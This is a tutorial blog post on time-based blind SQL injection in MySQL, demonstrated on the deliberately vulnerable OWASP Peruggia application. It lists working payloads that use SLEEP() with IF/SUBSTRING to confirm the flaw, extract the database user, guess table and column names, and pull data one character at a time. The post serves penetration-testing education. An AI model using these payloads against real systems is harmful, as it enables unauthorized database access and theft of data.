MySQL Injection Time Based
We have already written a couple of posts on SQL Injection techniques, Such as "SQL Injection Union Based", "Blind SQL Injection" and last but not least "Common problems faced while performing SQL Injection", However how could the series miss the "Time based SQL injection" technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to @yappare.
Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet
OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine.
Tested on Peruggia application.
Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do.
But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function.
each DBMS have different type of function to use,but the steps usually quite similar.
In MSSQL we use WAITFOR DELAY
In POSTGRES we use PG_DELAY()
and so on..do check it on pentestmonkey cheatsheet :D
Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not.
Test it using this command
pic_id=13 and sleep(5)--
As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well.
Lets proceed to check the current user.
Here's the command the we are going to use
pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--
Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters.
From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why?
Because the 1st character of the current user start with 'p'.. not 'a' or 'h'
Then you can proceed to check for its 2nd character and so on.
pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--
pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--
So go on with table_name guessing.
pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then.
While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist!
How about guessing the column_name?Its easy.
pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)
See the image above?Still need any explanation? I bet you guys already understand it! :D
Get the data mode!
pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--
So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds.
And then proceed to test the 2nd,3rd char and so on..
The image shown that the username=admin..so is it correct?lets double check it
That's all for now!